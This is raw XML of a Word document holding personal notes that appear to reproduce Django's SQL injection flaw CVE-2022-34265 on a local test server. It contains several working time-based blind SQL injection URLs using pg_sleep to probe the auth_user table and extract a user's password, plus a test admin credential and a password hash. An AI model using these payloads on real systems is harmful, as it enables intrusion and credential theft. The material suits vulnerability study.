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BE3F" w14:textId="5689F5A1" w:rsidR="00DD3D22" w:rsidRDefault="00DD3D22">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DD3D22">
        <w:instrText>https://www.codegrepper.com/code-examples/shell/install+psycopg2%3D%3D2.8.6+failed</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00614833">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>https://www.codegrepper.com/code-examples/shell/install+psycopg2%3D%3D2.8.6+failed</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="202355D6" w14:textId="690924EC" w:rsidR="00DD3D22" w:rsidRDefault="00A84C8D">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00614833">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.geeksforgeeks.org/how-to-install-pgadmin4-in-kali-linux/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EDA5325" w14:textId="70188E12" w:rsidR="00CB1421" w:rsidRDefault="00A01C82">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00B64370">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://github.com/aeyesec/CVE-2022-34265</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A951B06" w14:textId="0D0F420C" w:rsidR="00A01C82" w:rsidRDefault="005900F9">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B64370">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.djangoproject.com/weblog/2022/jul/04/security-releases/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BE12EBE" w14:textId="77777777" w:rsidR="005900F9" w:rsidRDefault="005900F9"/>
    <w:p w14:paraId="05846306" w14:textId="77777777" w:rsidR="00A84C8D" w:rsidRDefault="00A84C8D"/>
    <w:p w14:paraId="269FFE9A" w14:textId="5BD6A4C6" w:rsidR="00DD3D22" w:rsidRDefault="00DD3D22">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD3D22">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD3D22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD3D22">
        <w:t>apt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD3D22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD3D22">
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD3D22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD3D22">
        <w:t>build-essential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="547C169F" w14:textId="377CB1AC" w:rsidR="00524258" w:rsidRDefault="00524258"/>
    <w:p w14:paraId="45B8DA24" w14:textId="079CCD1D" w:rsidR="00524258" w:rsidRPr="00F23085" w:rsidRDefault="00F23085">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23085">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00140831">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dana</w:t>
      </w:r>
      <w:r w:rsidR="00140831" w:rsidRPr="00F23085">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00524258" w:rsidRPr="00F23085">
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00524258" w:rsidRPr="00435B0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sCNKpArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00524258" w:rsidRPr="00F23085">
        <w:t>")</w:t>
      </w:r>
      <w:r w:rsidR="00524258" w:rsidRPr="00435B0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00524258" w:rsidRPr="00F23085">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00524258" w:rsidRPr="00435B0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00524258" w:rsidRPr="00F23085">
        <w:t>&amp;8</w:t>
      </w:r>
      <w:r w:rsidR="00524258" w:rsidRPr="00435B0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HL</w:t>
      </w:r>
      <w:r w:rsidR="00524258" w:rsidRPr="00F23085">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00524258" w:rsidRPr="00435B0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HAE</w:t>
      </w:r>
      <w:r w:rsidR="00524258" w:rsidRPr="00F23085">
        <w:t>&amp;8'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00524258" w:rsidRPr="00435B0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00524258" w:rsidRPr="00F23085">
        <w:t>5}</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23085">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23085">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>удобного</w:t>
      </w:r>
      <w:r w:rsidRPr="00F23085">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>администрирования объектов(тест)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C5D80" w14:textId="1D2B09F8" w:rsidR="00F23085" w:rsidRDefault="00F23085">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="172A23B2" wp14:editId="2C4FE46E">
            <wp:extent cx="5940425" cy="2402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313F" w14:textId="76C031F3" w:rsidR="00CB1421" w:rsidRDefault="00CB1421">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46491F0E" w14:textId="0531E8F0" w:rsidR="00CB1421" w:rsidRDefault="00CB1421">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00614833">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://systemweakness.com/lab-blind-sql-injection-with-time-delays-and-information-retrieval-2468e1cd81d0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78E7299D" w14:textId="77777777" w:rsidR="00CB1421" w:rsidRPr="00436073" w:rsidRDefault="00CB1421"/>
    <w:p w14:paraId="5CF0A4E7" w14:textId="16F3180C" w:rsidR="00140831" w:rsidRPr="00435B0E" w:rsidRDefault="00140831">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EE4DF1" w14:textId="5EC2BB98" w:rsidR="00140831" w:rsidRPr="00435B0E" w:rsidRDefault="00435B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00435B0E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8000/extract/?lookup=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20PG_SLEEP(5)--%22</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E1317A3" w14:textId="115AB8BF" w:rsidR="00435B0E" w:rsidRDefault="00435B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606E325B" w14:textId="212B66DA" w:rsidR="00435B0E" w:rsidRDefault="00435B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00614833">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8000/extract/?lookup=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20CASE%20WHEN%20(1=1)%20THEN%20pg_sleep(10)%20ELSE%20pg_sleep(0)%20END--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00427C24" w14:textId="2F530C11" w:rsidR="00435B0E" w:rsidRDefault="00435B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2002A432" w14:textId="45818531" w:rsidR="00313F62" w:rsidRDefault="00313F62">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00614833">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8000/extract/?lookup=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20CASE%20WHEN%20(username=%27Drew%27)%20THEN%20pg_sleep(10)%20ELSE%20pg_sleep(0)%20END%20FROM%20auth_user%20--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33157B1B" w14:textId="2DAD502F" w:rsidR="00313F62" w:rsidRDefault="007A62D0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00614833">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8000/extract/?lookup=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20CASE%20WHEN%20(username=%27Drew%27%20AND%20LENGTH(password)%3C129)%20THEN%20pg_sleep(10)%20ELSE%20pg_sleep(0)%20END%20FROM%20auth_user%20--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A85C88F" w14:textId="5AEDEB3D" w:rsidR="007A62D0" w:rsidRDefault="0053301D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00614833">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8000/extract/?lookup=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20CASE%20WHEN%20(username=%27Drew%27%20AND%20LENGTH(password)%3C33)%20THEN%20pg_sleep(10)%20ELSE%20pg_sleep(0)%20END%20FROM%20auth_user%20--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06860CD9" w14:textId="0BF88DAB" w:rsidR="0053301D" w:rsidRDefault="00B61F7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B61F7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>183320fc6c1c5eb1f457d9d1c54abd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B61F7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:Drew</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="595FA387" w14:textId="45114AAC" w:rsidR="00EB55C9" w:rsidRDefault="00EB55C9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436A94D5" w14:textId="355DAEE2" w:rsidR="00EB55C9" w:rsidRPr="00EB55C9" w:rsidRDefault="00EB55C9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Docker shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F709B8E" w14:textId="77777777" w:rsidR="00EB55C9" w:rsidRDefault="00EB55C9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB55C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB55C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker exec -it 49ea7c1a3ce0 /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB55C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49820A73" w14:textId="5E0C5F44" w:rsidR="00EB55C9" w:rsidRDefault="00EB55C9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Django shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF94E3" w14:textId="4C5BB4EF" w:rsidR="00EB55C9" w:rsidRDefault="00EB55C9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python manage.py shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F705DE7" w14:textId="2F8FDD84" w:rsidR="00B61F7A" w:rsidRDefault="00B61F7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DA40EFF" wp14:editId="1A2C4641">
            <wp:extent cx="5940425" cy="263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9BE" w14:textId="62BA06B9" w:rsidR="00B61F7A" w:rsidRPr="00B61F7A" w:rsidRDefault="00B61F7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B61F7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET /extract/?lookup=year%27%20FROM%20start_datetime</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B61F7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>))%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B61F7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20OR%201=1;SELECT%20CASE%20WHEN%20(username=%27Drew%27%20AND%20SUBSTRING(password,1,1)='a')%20THEN%20pg_sleep(10)%20ELSE%20pg_sleep(0)%20END%20FROM%20auth_user%20-- HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B61F7A" w:rsidRPr="00B6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D22"/>
    <w:rsid w:val="00025AEA"/>
    <w:rsid w:val="00140831"/>
    <w:rsid w:val="00313F62"/>
    <w:rsid w:val="0038370D"/>
    <w:rsid w:val="00435B0E"/>
    <w:rsid w:val="00436073"/>
    <w:rsid w:val="00524258"/>
    <w:rsid w:val="0053301D"/>
    <w:rsid w:val="005900F9"/>
    <w:rsid w:val="007A62D0"/>
    <w:rsid w:val="00A01C82"/>
    <w:rsid w:val="00A84C8D"/>
    <w:rsid w:val="00B61F7A"/>
    <w:rsid w:val="00CB1421"/>
    <w:rsid w:val="00DD3D22"/>
    <w:rsid w:val="00EB55C9"/>
    <w:rsid w:val="00F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5EC0"/>
  <w15:docId w15:val="{FAE88790-844E-4ECA-9DF0-4420B4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D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weakness.com/lab-blind-sql-injection-with-time-delays-and-information-retrieval-2468e1cd81d0" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8000/extract/?lookup=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20CASE%20WHEN%20(username=%27Drew%27%20AND%20LENGTH(password)%3C33)%20THEN%20pg_sleep(10)%20ELSE%20pg_sleep(0)%20END%20FROM%20auth_user%20-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extract/?lookup=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20CASE%20WHEN%20(username=%27Drew%27%20AND%20LENGTH(password)%3C129)%20THEN%20pg_sleep(10)%20ELSE%20pg_sleep(0)%20END%20FROM%20auth_user%20--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jangoproject.com/weblog/2022/jul/04/security-releases/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8000/extract/?lookup=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20CASE%20WHEN%20(username=%27Drew%27)%20THEN%20pg_sleep(10)%20ELSE%20pg_sleep(0)%20END%20FROM%20auth_user%20--" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aeyesec/CVE-2022-3426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extract/?lookup=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20CASE%20WHEN%20(1=1)%20THEN%20pg_sleep(10)%20ELSE%20pg_sleep(0)%20END--" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.geeksforgeeks.org/how-to-install-pgadmin4-in-kali-linux/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8000/extract/?lookup=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20PG_SLEEP(5)--%2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bakassarina bakassarina</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>bakassarina bakassarina</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-27T10:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-03T07:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>